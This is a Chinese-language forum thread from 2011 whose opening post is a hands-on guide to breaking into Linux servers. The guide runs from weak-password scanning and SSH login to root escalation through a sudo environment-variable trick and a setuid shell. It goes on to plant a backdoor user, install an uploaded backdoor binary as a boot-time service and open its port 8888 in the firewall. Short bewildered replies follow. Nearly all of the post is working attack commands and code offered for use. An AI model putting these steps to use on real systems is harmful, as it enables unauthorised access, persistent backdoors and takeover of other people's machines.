Linux提权

社区服务
高级搜索
猴岛论坛电脑百科Linux提权
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

Linux提权

楼层直达
cfansnow

ZxID:6781175

等级: 少校
- -! XSS到底怎么做啊
举报 只看楼主 使用道具 楼主   发表于: 2011-06-11 0
1.先拿X-scan等软件去扫描需要攻击的linux系统看看有没有弱口令
2.如果扫到的话使用putty工具来进行ssh远程登录
3.然后我们开始提权
cat > ex.sh << _EOF
#! /bin/bash
echo
_EOF


cat > ex.c << _EOF
#include<stdio.h>
int main(void) {
setuid(0);
system("/bin/sh");
return(0);
}
_EOF

chmod u+x ex.sh
gcc -o ex ex.c

setenv SHELLIOPTS xtrace
setenv PS4 '$(chown root:root;chmod u+s ex)'
sudo ./ex.sh
./ex



到此已到达ROOT权限

-------------------------------------------------------------------------------------------------------
PS:普通用户必须有sudo的权限...否则起不来
4.创建自己的用户并给与root权限
cd /bin
cat >snow.c << _EOF


#include<stdio.h>

int main (void) {
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
system('/bin/sh');
return(0);
}
_EOF

gcc -o snow snow.c

chmod 4755 snow

/usr/sbin/useradd -d /tmp -s /bin/snow snow


echo '111111' | passwd --stdin snow


到这后,linux已经成功提权(自己创建的账号(snow))
--------------------------------------------------------------------------------------------------------------------

然后使用ftp工具将后门程序传上去(我手里用的是ndoor.bz2 使用命令(put ndoor.bz2))

上传上去后使用解压命令解压bunzip2 ndoor.bz2

解压完成后,提升该文件的权限chmod 755 ndoor

更改文件的所有者 chown root:root ndoor

把这个文件移动到/bin下 mv ndoor

然后做一个启动项 cat > /etc/init.d/syssnow << _EOF

case "\$1" in

[ -x /bin/ndoor ] && /bin/ndoor

esac

_EOF

完成后,给与相应的权限和用户设置

chown root:root syssnow

chmod 755 syssnow

然后将文件做两个链接

ln -s /etc/init.d/syssnow /etc/rc.d/rc3.d/S98syssnow

ln -s /etc/init.d/syssnow /etc/rc.d/rc5.d/S98syssnow

完成后输入命令 /etc/init.d/syssnow start 打开后门

然后查看端口号

netstat -anp | grep ndoor 端口是8888 得到后使用将这条命令写入防火墙的访问控制列表中

/sbin/iptables -I INPUT -m tcp -p tcp --dport 8888 -j ACCEPT

/etc/init.d/iptables save
︶_︶

ZxID:13915568

等级: 中尉
fuck
举报 只看该作者 沙发   发表于: 2011-06-11 0
什么来的?不懂!
ck-fly

ZxID:13671759

等级: 列兵
举报 只看该作者 板凳   发表于: 2011-06-11 0
额,怎么还搞上提权了啊
゛庸人不自扰

ZxID:2318148

等级: 上将
梦太远

举报 只看该作者 地板   发表于: 2011-06-11 0
不现实、 
何必自醉自演自欺欺人。
« 返回列表
发帖 回复